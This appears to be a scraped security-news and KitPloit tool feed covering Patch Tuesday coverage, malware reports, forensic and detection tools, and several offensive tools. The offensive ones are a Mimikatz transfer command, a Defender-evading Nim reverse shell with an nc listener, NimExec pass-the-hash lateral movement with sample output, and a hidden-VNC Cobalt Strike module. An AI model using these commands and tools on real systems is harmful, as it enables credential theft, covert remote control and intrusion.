$ ./ -i /usr/share/powersploit/Privesc/PowerUp.ps1 -o script.ps1

$ ./ -i /usr/share/powersploit/Exfiltration/Invoke-Mimikatz.ps1 -o "C:\Windows\Temp\update.ps1" -m base64

Specify Grapical Remote Software
  • If you're targeting VNC network protocols you can specify the window name with tightvnc.

$ ./ -i implant.ps1 -w tightvnc

  • If you're targeting legacy operating systems with older RDP authentication specify the window name with rdesktop.

$ ./ -i implant.bat -w rdesktop

TODO and Help Wanted
  • Add text colors for better user experience

  • Implement Base64 file transfer

  • Implement Bin2Hex file transfer

  • Implement a persistence function for both windows and linux.

  • Implement antiforensics function for both windows and linux.

  • Implement to read shellcode input and run C# implant and powershell runspace

  • Implement privesc function for both windows and linux



☐ ☆ ✇ The Hacker News

Open-Source Xeno RAT Trojan Emerges as a Potent Threat on GitHub

By: The Hacker News — February 27th 2024 at 12:56
An "intricately designed" remote access trojan (RAT) called&nbsp;Xeno RAT&nbsp;has been made available on GitHub, making it easily accessible to other actors at no extra cost. Written in C# and compatible with Windows 10 and Windows 11 operating systems, the open-source RAT comes with a "comprehensive set of features for remote system management," according to its developer, who goes by the name
☐ ☆ ✇ Krebs on Security

Fat Patch Tuesday, February 2024 Edition

By: BrianKrebs — February 13th 2024 at 22:28

Microsoft Corp. today pushed software updates to plug more than 70 security holes in its Windows operating systems and related products, including two zero-day vulnerabilities that are already being exploited in active attacks.

Top of the heap on this Fat Patch Tuesday is CVE-2024-21412, a “security feature bypass” in the way Windows handles Internet Shortcut Files that Microsoft says is being targeted in active exploits. Redmond’s advisory for this bug says an attacker would need to convince or trick a user into opening a malicious shortcut file.

Researchers at Trend Micro have tied the ongoing exploitation of CVE-2024-21412 to an advanced persistent threat group dubbed “Water Hydra,” which they say has being using the vulnerability to execute a malicious Microsoft Installer File (.msi) that in turn unloads a remote access trojan (RAT) onto infected Windows systems.

The other zero-day flaw is CVE-2024-21351, another security feature bypass — this one in the built-in Windows SmartScreen component that tries to screen out potentially malicious files downloaded from the Web. Kevin Breen at Immersive Labs says it’s important to note that this vulnerability alone is not enough for an attacker to compromise a user’s workstation, and instead would likely be used in conjunction with something like a spear phishing attack that delivers a malicious file.

Satnam Narang, senior staff research engineer at Tenable, said this is the fifth vulnerability in Windows SmartScreen patched since 2022 and all five have been exploited in the wild as zero-days. They include CVE-2022-44698 in December 2022, CVE-2023-24880 in March 2023, CVE-2023-32049 in July 2023 and CVE-2023-36025 in November 2023.

Narang called special attention to CVE-2024-21410, an “elevation of privilege” bug in Microsoft Exchange Server that Microsoft says is likely to be exploited by attackers. Attacks on this flaw would lead to the disclosure of NTLM hashes, which could be leveraged as part of an NTLM relay or “pass the hash” attack, which lets an attacker masquerade as a legitimate user without ever having to log in.

“We know that flaws that can disclose sensitive information like NTLM hashes are very valuable to attackers,” Narang said. “A Russian-based threat actor leveraged a similar vulnerability to carry out attacks – CVE-2023-23397 is an Elevation of Privilege vulnerability in Microsoft Outlook patched in March 2023.”

Microsoft notes that prior to its Exchange Server 2019 Cumulative Update 14 (CU14), a security feature called Extended Protection for Authentication (EPA), which provides NTLM credential relay protections, was not enabled by default.

“Going forward, CU14 enables this by default on Exchange servers, which is why it is important to upgrade,” Narang said.

Rapid7’s lead software engineer Adam Barnett highlighted CVE-2024-21413, a critical remote code execution bug in Microsoft Office that could be exploited just by viewing a specially-crafted message in the Outlook Preview pane.

“Microsoft Office typically shields users from a variety of attacks by opening files with Mark of the Web in Protected View, which means Office will render the document without fetching potentially malicious external resources,” Barnett said. “CVE-2024-21413 is a critical RCE vulnerability in Office which allows an attacker to cause a file to open in editing mode as though the user had agreed to trust the file.”

Barnett stressed that administrators responsible for Office 2016 installations who apply patches outside of Microsoft Update should note the advisory lists no fewer than five separate patches which must be installed to achieve remediation of CVE-2024-21413; individual update knowledge base (KB) articles further note that partially-patched Office installations will be blocked from starting until the correct combination of patches has been installed.

It’s a good idea for Windows end-users to stay current with security updates from Microsoft, which can quickly pile up otherwise. That doesn’t mean you have to install them on Patch Tuesday. Indeed, waiting a day or three before updating is a sane response, given that sometimes updates go awry and usually within a few days Microsoft has fixed any issues with its patches. It’s also smart to back up your data and/or image your Windows drive before applying new updates.

For a more detailed breakdown of the individual flaws addressed by Microsoft today, check out the SANS Internet Storm Center’s list. For those admins responsible for maintaining larger Windows environments, it often pays to keep an eye on, which frequently points out when specific Microsoft updates are creating problems for a number of users.

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Microsoft Introduces Linux-Like 'sudo' Command to Windows 11

By: Newsroom — February 12th 2024 at 05:45
Microsoft said it's introducing Sudo for Windows 11 as part of an early preview version to help users execute commands with administrator privileges. "Sudo for Windows is a new way for users to run elevated commands directly from an unelevated console session," Microsoft Product Manager Jordi Adoumie&nbsp;said. "It is an ergonomic and familiar solution for users who want to elevate a command
☐ ☆ ✇ The Hacker News

DirtyMoe Malware Infects 2,000+ Ukrainian Computers for DDoS and Cryptojacking

By: Newsroom — February 2nd 2024 at 13:17
The Computer Emergency Response Team of Ukraine (CERT-UA) has warned that more than 2,000 computers in the country have been infected by a strain of malware called DirtyMoe. The agency&nbsp;attributed&nbsp;the campaign to a threat actor it calls&nbsp;UAC-0027. DirtyMoe, active since at least 2016, is capable of carrying out cryptojacking and distributed denial-of-service (DDoS) attacks. In March
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PurpleKeep - Providing Azure Pipelines To Create An Infrastructure And Run Atomic Tests

By: Zion3R — January 30th 2024 at 11:30

With the rapidly increasing variety of attack techniques and a simultaneous rise in the number of detection rules offered by EDRs (Endpoint Detection and Response) and custom-created ones, the need for constant functional testing of detection rules has become evident. However, manually re-running these attacks and cross-referencing them with detection rules is a labor-intensive task which is worth automating.

To address this challenge, I developed "PurpleKeep," an open-source initiative designed to facilitate the automated testing of detection rules. Leveraging the capabilities of the Atomic Red Team project which allows to simulate attacks following MITRE TTPs (Tactics, Techniques, and Procedures). PurpleKeep enhances the simulation of these TTPs to serve as a starting point for the evaluation of the effectiveness of detection rules.

Automating the process of simulating one or multiple TTPs in a test environment comes with certain challenges, one of which is the contamination of the platform after multiple simulations. However, PurpleKeep aims to overcome this hurdle by streamlining the simulation process and facilitating the creation and instrumentation of the targeted platform.

Primarily developed as a proof of concept, PurpleKeep serves as an End-to-End Detection Rule Validation platform tailored for an Azure-based environment. It has been tested in combination with the automatic deployment of Microsoft Defender for Endpoint as the preferred EDR solution. PurpleKeep also provides support for security and audit policy configurations, allowing users to mimic the desired endpoint environment.

To facilitate analysis and monitoring, PurpleKeep integrates with Azure Monitor and Log Analytics services to store the simulation logs and allow further correlation with any events and/or alerts stored in the same platform.

TLDR: PurpleKeep provides an Attack Simulation platform to serve as a starting point for your End-to-End Detection Rule Validation in an Azure-based environment.


The project is based on Azure Pipelines and requires the following to be able to run:

  • Azure Service Connection to a resource group as described in the Microsoft Docs
  • Assignment of the "Key Vault Administrator" Role for the previously created Enterprise Application
  • MDE onboarding script, placed as a Secure File in the Library of Azure DevOps and make it accessible to the pipelines


You can provide a security and/or audit policy file that will be loaded to mimic your Group Policy configurations. Use the Secure File option of the Library in Azure DevOps to make it accessible to your pipelines.

Refer to the variables file for your configurable items.



Deploying the infrastructure uses the Azure Pipeline to perform the following steps:

  • Deploy Azure services:
    • Key Vault
    • Log Analytics Workspace
    • Data Connection Endpoint
    • Data Connection Rule
  • Generate SSH keypair and password for the Windows account and store in the Key Vault
  • Create a Windows 11 VM
  • Install OpenSSH
  • Configure and deploy the SSH public key
  • Install Invoke-AtomicRedTeam
  • Install Microsoft Defender for Endpoint and configure exceptions
  • (Optional) Apply security and/or audit policy files
  • Reboot


Currently only the Atomics from the public repository are supported. The pipelines takes a Technique ID as input or a comma seperate list of techniques, for example:

  • T1059.003
  • T1027,T1049,T1003

The logs of the simulation are ingested into the AtomicLogs_CL table of the Log Analytics Workspace.

There are currently two ways to run the simulation:

Rotating simulation

This pipeline will deploy a fresh platform after the simulation of each TTP. The Log Analytic workspace will maintain the logs of each run.

Warning: this will onboard a large number of hosts into your EDR

Single deploy simulation

A fresh infrastructure will be deployed only at the beginning of the pipeline. All TTP's will be simulated on this instance. This is the fastests way to simulate and prevents onboarding a large number of devices, however running a lot of simulations in a same environment has the risk of contaminating the environment and making the simulations less stable and predictable.


Must have

  • Check if pre-reqs have been fullfilled before executing the atomic
  • Provide the ability to import own group policy
  • Cleanup biceps and pipelines by using a master template (Complete build)
  • Build pipeline that runs technique sequently with reboots in between
  • Add Azure ServiceConnection to variables instead of parameters

Nice to have

  • MDE Off-boarding (?)
  • Automatically join and leave AD domain
  • Make Atomics repository configureable
  • Deploy VECTR as part of the infrastructure and ingest results during simulation. Also see the VECTR API issue
  • Tune alert API call to Microsoft Defender for Endpoint (Microsoft.Security alertsSuppressionRules)
  • Add C2 infrastructure for manual or C2 based simulations


  • Atomics do not return if a simulation succeeded or not
  • Unreliable OpenSSH extension installer failing infrastructure deployment
  • Spamming onboarded devices in the EDR


☐ ☆ ✇ The Hacker News

Researchers Uncover How Outlook Vulnerability Could Leak Your NTLM Passwords

By: Newsroom — January 29th 2024 at 13:31
A now-patched security flaw in Microsoft Outlook could be exploited by threat actors to access NT LAN Manager (NTLM) v2 hashed passwords when opening a specially crafted file. The issue, tracked as CVE-2023-35636 (CVSS score: 6.5), was addressed by the tech giant as part of its&nbsp;Patch Tuesday updates&nbsp;for December 2023. "In an email attack scenario, an attacker could exploit the
☐ ☆ ✇ The Hacker News

Hackers Weaponize Windows Flaw to Deploy Crypto-Siphoning Phemedrone Stealer

By: Newsroom — January 16th 2024 at 07:13
Threat actors have been observed leveraging a now-patched security flaw in Microsoft Windows to deploy an open-source information stealer called&nbsp;Phemedrone Stealer. “Phemedrone targets web browsers and data from cryptocurrency wallets and messaging apps such as Telegram, Steam, and Discord,” Trend Micro researchers Peter Girnus, Aliakbar Zahravi, and Simon Zuckerbraun&nbsp;said. “It also
☐ ☆ ✇ The Hacker News

Microsoft's January 2024 Windows Update Patches 48 New Vulnerabilities

By: Newsroom — January 10th 2024 at 05:26
Microsoft has addressed a total of&nbsp;48 security flaws&nbsp;spanning its software as part of its Patch Tuesday updates for January 2024. Of the 48 bugs, two are rated Critical and 46 are rated Important in severity. There is no evidence that any of the issues are publicly known or under active attack at the time of release, making it the second consecutive Patch Tuesday with no zero-days. The
☐ ☆ ✇ The Hacker News

New Variant of DLL Search Order Hijacking Bypasses Windows 10 and 11 Protections

By: Newsroom — January 1st 2024 at 14:00
Security researchers have detailed a new variant of a dynamic link library (DLL) search order hijacking technique that could be used by threat actors to bypass security mechanisms and achieve execution of malicious code on systems running Microsoft Windows 10 and Windows 11. The approach "leverages executables commonly found in the trusted WinSxS folder and exploits them via the classic DLL
☐ ☆ ✇ KitPloit - PenTest Tools!

Pantheon - Insecure Camera Parser

By: Zion3R — January 1st 2024 at 11:30

Pantheon is a GUI application that allows users to display information regarding network cameras in various countries as well as an integrated live-feed for non-protected cameras.


Pantheon allows users to execute an API crawler. There was original functionality without the use of any API's (like Insecam), but Google TOS kept getting in the way of the original scraping mechanism.


  1. git clone
  2. cd Pantheon
  3. pip3 install -r requirements.txt
    Execution: python3
  • Note: I will later add a GUI installer to make it fully indepenent of a CLI


  • You can just follow the steps above or download the official package here.
  • Note, the PE binary of Pantheon was put together using pyinstaller, so Windows Defender might get a bit upset.


  • First, complete steps 1, 2 and 3 listed above.
  • chmod +x distros/
  • ./distros/

Debian and Kali Linux

  • First, complete steps 1, 2 and 3 listed above.
  • chmod +x distros/
  • ./distros/


  • The regular installation steps above should suffice. If not, open up an issue.


(Enter) on a selected IP:Port to establish a Pantheon webview of the camera. (Use this at your own risk)

(Left-click) on a selected IP:Port to view the geolocation of the camera.
(Right-click) on a selected IP:Port to view the HTTP data of the camera (Ctrl+Left-click for Mac).

Adjust the map as you please to see the markers.

  • Also note that this app is far from perfect and not every link that shows up is a live-feed, some are login pages (Do NOT attempt to login).

Ethical Notice

The developer of this program, Josh Schiavone, is not resposible for misuse of this data gathering tool. Pantheon simply provides information that can be indexed by any modern search engine. Do not try to establish unauthorized access to live feeds that are password protected - that is illegal. Furthermore, if you do choose to use Pantheon to view a live-feed, do so at your own risk. Pantheon was developed for educational purposes only. For further information, please visit:


MIT License
Copyright (c) Josh Schiavone

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Blutter - Flutter Mobile Application Reverse Engineering Tool

By: Zion3R — December 26th 2023 at 11:30

Flutter Mobile Application Reverse Engineering Tool by Compiling Dart AOT Runtime

Currently the application supports only Android (arm64 only). Also the application is currently work only against recent Dart versions.

For high priority missing features, see TODO

Environment Setup

This application uses C++20 Formatting library. It requires very recent C++ compiler such as g++>=13, Clang>=15.

I recommend using Linux OS (only tested on Deiban sid/trixie) because it is easy to setup.

Debian Unstable (gcc 13)

  • Install build tools and depenencies
apt install python3-pyelftools python3-requests git cmake ninja-build \
build-essential pkg-config libicu-dev libcapstone-dev


  • Install git and python 3
  • Install latest Visual Studio with "Desktop development with C++" and "C++ CMake tools"
  • Install required libraries (libcapstone and libicu4c)
python scripts\
  • Start "x64 Native Tools Command Prompt"

macOS Ventura (clang 15)

  • Install XCode
  • Install clang 15 and required tools
brew install llvm@15 cmake ninja pkg-config icu4c capstone
pip3 install pyelftools requests


Extract "lib" directory from apk file

python3 path/to/app/lib/arm64-v8a out_dir

The will automatically detect the Dart version from the flutter engine and call executable of blutter to get the information from

If the blutter executable for required Dart version does not exists, the script will automatically checkout Dart source code and compiling it.


You can use git pull to update and run with --rebuild option to force rebuild the executable

python3 path/to/app/lib/arm64-v8a out_dir --rebuild

Output files

  • asm/* libapp assemblies with symbols
  • blutter_frida.js the frida script template for the target application
  • objs.txt complete (nested) dump of Object from Object Pool
  • pp.txt all Dart objects in Object Pool


  • bin contains blutter executables for each Dart version in "blutter_dartvm<ver>_<os>_<arch>" format
  • blutter contains source code. need building against Dart VM library
  • build contains building projects which can be deleted after finishing the build process
  • dartsdk contains checkout of Dart Runtime which can be deleted after finishing the build process
  • external contains 3rd party libraries for Windows only
  • packages contains the static libraries of Dart Runtime
  • scripts contains python scripts for getting/building Dart

Generating Visual Studio Solution for Development

I use Visual Studio to delevlop Blutter on Windows. --vs-sln options can be used to generate a Visual Studio solution.

python path\to\lib\arm64-v8a build\vs --vs-sln


  • More code analysis
    • Function arguments and return type
    • Some psuedo code for code pattern
  • Generate better Frida script
    • More internal classes
    • Object modification
  • Obfuscated app (still missing many functions)
  • Reading iOS binary
  • Input as apk or ipa

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Linpmem - A Physical Memory Acquisition Tool For Linux

By: Zion3R — December 21st 2023 at 11:30

Like its Windows counterpart, Winpmem, this is not a traditional memory dumper. Linpmem offers an API for reading from any physical address, including reserved memory and memory holes, but it can also be used for normal memory dumping. Furthermore, the driver offers a variety of access modes to read physical memory, such as byte, word, dword, qword, and buffer access mode, where buffer access mode is appropriate in most standard cases. If reading requires an aligned byte/word/dword/qword read, Linpmem will do precisely that.

Currently, the Linpmem features:

  1. Read from physical address (access mode byte, word, dword, qword, or buffer)
  2. CR3 info service (specify target process by pid)
  3. Virtual to physical address translation service

Cache Control is to be added in future for support of the specialized read access modes.

Building the kernel driver

At least for now, you must compile the Linpmem driver yourself. A method to load a precompiled Linpmem driver on other Linux systems is currently under work, but not finished yet. That said, compiling the Linpmem driver is not difficult, basically it's executing 'make'.

Step 1 - getting the right headers

You need make and a C compiler. (We recommend gcc, but clang should work as well).

Make sure that you have the linux-headers installed (using whatever package manager your target linux distro has). The exact package name may vary on your distribution. A quick (distro-independent) way to check if you have the package installed:

ls -l /usr/lib/modules/`uname -r`/

That's it, you can proceed to step 2.

Foreign system: Currently, if you want to compile the driver for another system, e.g., because you want to create a memory dump but can't compile on the target, you have to download the header package directly from the package repositories of that system's Linux distribution. Double-check that the package version exactly matches the release and kernel version running on the foreign system. In case the other system is using a self-compiled kernel you have to obtain a copy of that kernel's build directory. Then, place the location of either directory in the KDIR environment variable.

export KDIR=path/to/extracted/header/package/or/kernel/root

Step 2 - make

Compiling the driver is simple, just type:


This should produce linpmem.ko in the current working directory.

You might want to check precompiler.h before and chose whether to compile for release or debug (e.g., with debug printing). There aren't much other precompiler settings right now.

Loading The Driver

The linpmem.ko module can be loaded by using insmod path-to-linpmem.ko, and unloaded with rmmod path-to-linpmem.ko. (This will load the driver only for this uptime.) If you compiled for debug, also take a look at dmesg.

After loading, for talking to the driver, you need to create the device:

mknod /dev/linpmem c 42 0

If you can't talk to the driver, potentially check in dmesg log to verify that '42' was indeed the registered major:

[12827.900168] linpmem: registered chrdev with major 42

Though usually the kernel would try to really assign this number.

You can use chown on the device to give it to your user, if you do not want to have a root console open all the time. (Or just keep using it in a root console.)

  • Watch dmesg output. Please report errors if you see any!
  • Warning: if there is a dmesg error print from Linpmem telling to reboot, better do it immediately.
  • Warning: this is an early version.


Demo Code

There is an example code demonstrating and explaining (in detail) how to interact with the driver. The user-space API reference can furthermore be found in ./userspace_interface/linpmem_shared.h.

  1. cd demo
  2. gcc -o test test.c
  3. (sudo) ./test // <= you need sudo if you did not use chown on the device.

This code is important, if you want to understand how to directly interact with the driver instead of using a library. It can also be used as a short function test.

Command Line Interface Tool

There is an (optional) basic command line interface tool to Linpmem, the pmem CLI tool. It can be found here: Aside from the source code, there is also a precompiled CLI tool as well as the precompiled static library and headers that can be found here (signed). Note: this is a preliminary version, be sure to check for updates, as many additions and enhancements will follow soon.

The pmem CLI tool can be used for testing the various functions of Linpmem in a (relatively) safe and convenient manner. Linpmem can also be loaded by this tool instead of using insmod/rmmod, with some extra options in future. This also has the advantage that pmem auto-creates the right device for you for immediate use. It is extremely portable and runs on any Linux system (and, in fact, has been tested even on a Linux 2.6).

$ ./pmem -h
Command-line client for the linpmem driver

Usage: pmem [OPTIONS] [COMMAND]

insmod Load the linpmem driver
help Print this message or the help of the given subcommand(s)

-a, --address <ADDRESS> Address for physical read operations
-v, --virt-address <VIRT_ADDRESS> Translate address in target process' address space (default: current process)
-s, --size <SIZE> Size of buffer read operations
-m, --mode <MODE> Access mode for read operations [possible values: byte, word, dword, qword, buffer]
-p, --pid <PID> Target process for cr3 info and virtual-to-physical translations
--cr3 Query cr3 value of target process (default: current process)
--verbose Display debug output
-h, --help Print help (see more with '--help')
-V, --version Print version

If you want to compile the cli tool yourself, change to its directory and follow the instructions in the (cli) Readme to build it. Otherwise, just download the prebuilt program, it should work on any Linux. To load the kernel driver with the cli tool:

# pmem insmod path/to/linpmem.ko

The advantage of using the pmem tool to load the driver is that you do not have to create the device file yourself, and it will offer (on next releases) to choose who owns the linpmem device.


The pmem command line interface is only a thin wrapper around a small Rust library that exposes an API for interfacing with the driver. More advanced users can also use this library. The library is automatically compiled (as static portable library) along with the pmem cli tool when compiling from, but also included (precompiled) here (signed). Note: this is a preliminary version, more to follow soon.

If you do not want to use the usermode library and prefer to interface with the driver directly on your own, you can find its user-space API/interface and documentation in ./userspace_interface/linpmem_shared.h. We also provide example code in demo/test.c that explains how to use the driver directly.

Memdumping tool

Not implemented yet.

Tested Linux Distributions

  • Debian, self-compiled 6.4.X, Qemu/KVM, not paravirtualized.
    • PTI: off/on
  • Debian 12, Qemu/KVM, fully paravirtualized.
    • PTI: on
  • Ubuntu server, Qemu/KVM, not paravirtualized.
    • PTI: on
  • Fedora 38, Qemu/KVM, fully paravirtualized.
    • PTI: on
  • Baremetal Linux test, AMI BIOS: Linux 6.4.4
    • PTI: on
  • Baremetal Linux test, HP: Linux 6.4.4
    • PTI: on
  • Baremetal, Arch[-hardened], Dell BIOS, Linux 6.4.X
  • Baremetal, Debian, 6.1.X
  • Baremetal, Ubuntu 20.04 with Secure Boot on. Works, but sign driver first.
  • Baremetal, Ubuntu 22.04, Linux 6.2.X

Handling Secure Boot

If the system reports the following error message when loading the module, it might be because of secure boot:

$ sudo insmod linpmem.ko
insmod: ERROR: could not insert module linpmem.ko: Operation not permitted

There are different ways to still load the module. The obvious one is to disable secure boot in your UEFI settings.

If your distribution supports it, a more elegant solution would be to sign the module before using it. This can be done using the following steps (tested on Ubuntu 20.04).

  1. Install mokutil:
    $ sudo apt install mokutil
  2. Create the singing key material:
    $ openssl req -new -newkey rsa:4096 -keyout mok-signing.key -out mok-signing.crt -outform DER -days 365 -nodes -subj "/CN=Some descriptive name/"
    Make sure to adjust the options to your needs. Especially, consider the key length (-newkey), the validity (-days), the option to set a key pass phrase (-nodes; leave it out, if you want to set a pass phrase), and the common name to include into the certificate (-subj).
  3. Register the new MOK:
    $ sudo mokutil --import mok-signing.crt
    You will be asked for a password, which is required in the following step. Consider using a password, which you can type on a US keyboard layout.
  4. Reboot the system. It will enter a MOK enrollment menu. Follow the instructions to enroll your new key.
  5. Sign the module Once the MOK is enrolled, you can sign your module.
    $ /usr/src/linux-headers-$(uname -r)/scripts/sign-file sha256 path/to/mok-singing/MOK.key path/to//MOK.cert path/to/linpmem.ko

After that, you should be able to load the module.

Note that from a forensic-readiness perspective, you should prepare a signed module before you need it, as the system will reboot twice during the process described above, destroying most of your volatile data in memory.

Known Issues

  • Huge page read is not implemented. Linpmem recognizes a huge page and rejects the read, for now.
  • Reading from mapped io and DMA space will be done with CPU caching enabled.
  • No locks are taken during the page table walk. This might lead to funny results when concurrent modifications are going on. This is a general and (mostly unsolvable) problem of live RAM reading, without halting the entire OS to full stop.
  • Secure Boot (Ubuntu): please sign your driver prior to using.
  • Any CPU-powered memory encryption, e.g., AMD SME, Intel SGX/TDX, ...
  • Pluton chips?

(Please report potential issues if you encounter anything.)

Under work

  • Loading precompiled driver on any Linux.
  • Processor cache control. Example: for uncached reading of mapped I/O and DMA space.

Future work

  • Arm/Mips support. (far future work)
  • Legacy kernels (such as 2.6), unix-based kernels


Linpmem, as well as Winpmem, would not exist without the work of our predecessors of the (now retired) REKALL project:

  • We would like to thank Mike Cohen and Johannes Stüttgen for their pioneer work and open source contribution on PTE remapping, a technique which is still in use 10 years later.

Our open source contributors:

  • Viviane Zwanger
  • Valentin Obst

☐ ☆ ✇ The Hacker News

Beware: Experts Reveal New Details on Zero-Click Outlook RCE Exploits

By: Newsroom — December 18th 2023 at 15:43
Technical details have emerged about two now-patched security flaws in Microsoft Windows that could be chained by threat actors to achieve remote code execution on the Outlook email service sans any user interaction. "An attacker on the internet can chain the vulnerabilities together to create a full, zero-click remote code execution (RCE) exploit against Outlook clients," Akamai security
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Nim-Shell - Reverse Shell That Can Bypass Windows Defender Detection

By: Zion3R — December 16th 2023 at 11:30

Reverse shell that can bypass windows defender detection

$ apt install nim


nim c -d:mingw --app:gui nimshell.nim

Change the IP address and port number you want to listen to in the nimshell.nim file according to your device.

and listen

 $ nc -nvlp 4444

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Douglas-042 - Powershell Script To Help Speed ​​Up Threat Hunting Incident Response Processes

By: Zion3R — December 11th 2023 at 11:30

DOUGLAS-042 stands as an ingenious embodiment of a PowerShell script meticulously designed to expedite the triage process and facilitate the meticulous collection of crucial evidence derived from both forensic artifacts and the ephemeral landscape of volatile data. Its fundamental mission revolves around providing indispensable aid in the arduous task of pinpointing potential security breaches within Windows ecosystems. With an overarching focus on expediency, DOUGLAS-042 orchestrates the efficient prioritization and methodical aggregation of data, ensuring that no vital piece of information eludes scrutiny when investigating a possible compromise. As a testament to its organized approach, the amalgamated data finds its sanctuary within the confines of a meticulously named text file, bearing the nomenclature of the host system's very own hostname. This practice of meticulous data archival emerges not just as a systematic convention, but as a cornerstone that paves the way for seamless transitions into subsequent stages of the Forensic journey.

Content Queries

  • General information
  • Accountand group information
  • Network
  • Process Information
  • OS Build and HOTFIXE
  • Persistence
  • HARDWARE Information
  • Encryption information
  • Services
  • History
  • SMB Queries
  • Remoting queries
  • REGISTRY Analysis
  • LOG queries
  • Instllation of Software
  • User activity

Advanced Queries

  • Prefetch file information
  • DLL List
  • WMI filters and consumers
  • Named pipes


Using administrative privileges, just run the script from a PowerShell console, then the results will be saved in the directory as a txt file.

$ PS >./douglas.ps1

Advance usage

$ PS >./douglas.ps1 -a


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Py-Amsi - Scan Strings Or Files For Malware Using The Windows Antimalware Scan Interface

By: Zion3R — December 10th 2023 at 11:30

py-amsi is a library that scans strings or files for malware using the Windows Antimalware Scan Interface (AMSI) API. AMSI is an interface native to Windows that allows applications to ask the antivirus installed on the system to analyse a file/string. AMSI is not tied to Windows Defender. Antivirus providers implement the AMSI interface to receive calls from applications. This library takes advantage of the API to make antivirus scans in python. Read more about the Windows AMSI API here.


  • Via pip

    pip install pyamsi
  • Clone repository

    git clone
    cd py-amsi/
    python install


dictionary of the format # { # 'Sample Size' : 68, // The string/file size in bytes # 'Risk Level' : 0, // The risk level as suggested by the antivirus # 'Message' : 'File is clean' // Response message # }" dir="auto">
from pyamsi import Amsi

# Scan a file
Amsi.scan_file(file_path, debug=True) # debug is optional and False by default

# Scan string
Amsi.scan_string(string, string_name, debug=False) # debug is optional and False by default

# Both functions return a dictionary of the format
# {
# 'Sample Size' : 68, // The string/file size in bytes
# 'Risk Level' : 0, // The risk level as suggested by the antivirus
# 'Message' : 'File is clean' // Response message
# }
Risk Level Meaning
0 AMSI_RESULT_CLEAN (File is clean)
1 AMSI_RESULT_NOT_DETECTED (No threat detected)
16384 AMSI_RESULT_BLOCKED_BY_ADMIN_START (Threat is blocked by the administrator)
20479 AMSI_RESULT_BLOCKED_BY_ADMIN_END (Threat is blocked by the administrator)
32768 AMSI_RESULT_DETECTED (File is considered malware)


☐ ☆ ✇ KitPloit - PenTest Tools!

NimExec - Fileless Command Execution For Lateral Movement In Nim

By: Zion3R — December 3rd 2023 at 11:30

Basically, NimExec is a fileless remote command execution tool that uses The Service Control Manager Remote Protocol (MS-SCMR). It changes the binary path of a random or given service run by LocalSystem to execute the given command on the target and restores it later via hand-crafted RPC packets instead of WinAPI calls. It sends these packages over SMB2 and the svcctl named pipe.

NimExec needs an NTLM hash to authenticate to the target machine and then completes this authentication process with the NTLM Authentication method over hand-crafted packages.

Since all required network packages are manually crafted and no operating system-specific functions are used, NimExec can be used in different operating systems by using Nim's cross-compilability support.

This project was inspired by Julio's SharpNoPSExec tool. You can think that NimExec is Cross Compilable and built-in Pass the Hash supported version of SharpNoPSExec. Also, I learned the required network packet structures from Kevin Robertson's Invoke-SMBExec Script.


nim c -d:release --gc:markAndSweep -o:NimExec.exe Main.nim

The above command uses a different Garbage Collector because the default garbage collector in Nim is throwing some SIGSEGV errors during the service searching process.

Also, you can install the required Nim modules via Nimble with the following command:

nimble install ptr_math nimcrypto hostname


test@ubuntu:~/Desktop/NimExec$ ./NimExec -u testuser -d TESTLABS -h 123abcbde966780cef8d9ec24523acac -t -c 'cmd.exe /c "echo test > C:\Users\Public\test.txt"' -v

_..._ .--. __ __ ___ __.....__ __.....__ .' .' '.\
.' '. |__|| |/ `.' `. .-'' '. .-'' '. / .'
. .-. ..--.| .-. .-. ' / .-''"'-. `. / .-''"'-. `. . '
| ' ' || || | | | | |/ /________\ \ ____ _____/ /________\ \| |
| | | || || | | | | || |`. \ .' /| || |
| | | || || | | | | |\ .--- ----------' `. `' .' \ .-------------'. '
| | | || || | | | | | \ '-.____...---. '. .' \ '-.____...---. \ '. .
| | | ||__||__| |__| |__| `. .' .' `. `. .' '. `._____.-'/
| | | | `''-...... -' .' .'`. `. `''-...... -' `-.______ /
| | | | .' / `. `. `
'--' '--' '----' '----'


[+] Connected to
[+] NTLM Authentication with Hash is succesfull!
[+] Connected to IPC Share of target!
[+] Opened a handle for svcctl pipe!
[+] Bound to the RPC Interface!
[+] RPC Binding is acknowledged!
[+] SCManager handle is obtained!
[+] Number of obtained services: 265
[+] Selected service is LxpSvc
[+] Service: LxpSvc is opened!
[+] Previous Service Path is: C:\Windows\system32\svchost.exe -k netsvcs
[+] Service config is changed!
[!] StartServiceW Return Value: 1053 (ERROR_SERVICE_REQUEST_TIMEOUT)
[+] Service start request is sent!
[+] Service config is restored!
[+] Service handle is closed!
[+] Service Manager handle is closed!
[+] SMB is closed!
[+] Tree is disconnected!
[+] Session logoff!

It's tested against Windows 10&11, Windows Server 16&19&22 from Ubuntu 20.04 and Windows 10 machines.

Command Line Parameters

    -v | --verbose                          Enable more verbose output.
-u | --username <Username> Username for NTLM Authentication.*
-h | --hash <NTLM Hash> NTLM password hash for NTLM Authentication.*
-t | --target <Target> Lateral movement target.*
-c | --command <Command> Command to execute.*
-d | --domain <Domain> Domain name for NTLM Authentication.
-s | --service <Service Name> Name of the service instead of a random one.
--help Show the help message.


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HiddenDesktop - HVNC For Cobalt Strike

By: Zion3R — November 29th 2023 at 11:30

Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved, but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++.

There are four components of Hidden Desktop:

  1. BOF initializer: Small program responsible for injecting the HVNC code into the Beacon process.

  2. HVNC shellcode: PIC implementation of TinyNuke HVNC.

  3. Server and operator UI: Server that listens for connections from the HVNC shellcode and a UI that allows the operator to interact with the remote desktop. Currently only supports Windows.

  4. Application launcher BOFs: Set of Beacon Object Files that execute applications in the new desktop.


Download the latest release or compile yourself using make. Start the HVNC server on a Windows machine accessible from the teamserver. You can then execute the client with:

HiddenDesktop <server> <port>

You should see a new blank window on the server machine. The BOF does not execute any applications by default. You can use the application launcher BOFs to execute common programs on the new desktop:


You can also launch programs through File Explorer using the mouse and keyboard. Other applications can be executed using the following command:

hd-launch <command> [args]



Implementation Details

  1. The Aggressor script generates random pipe and desktop names. These are passed to the BOF initializer as arguments. The desktop name is stored in CS preferences at execution and is used by the application launcher BOFs. HVNC traffic is forwarded back to the team server using rportfwd. Status updates are sent back to Beacon through a named pipe.
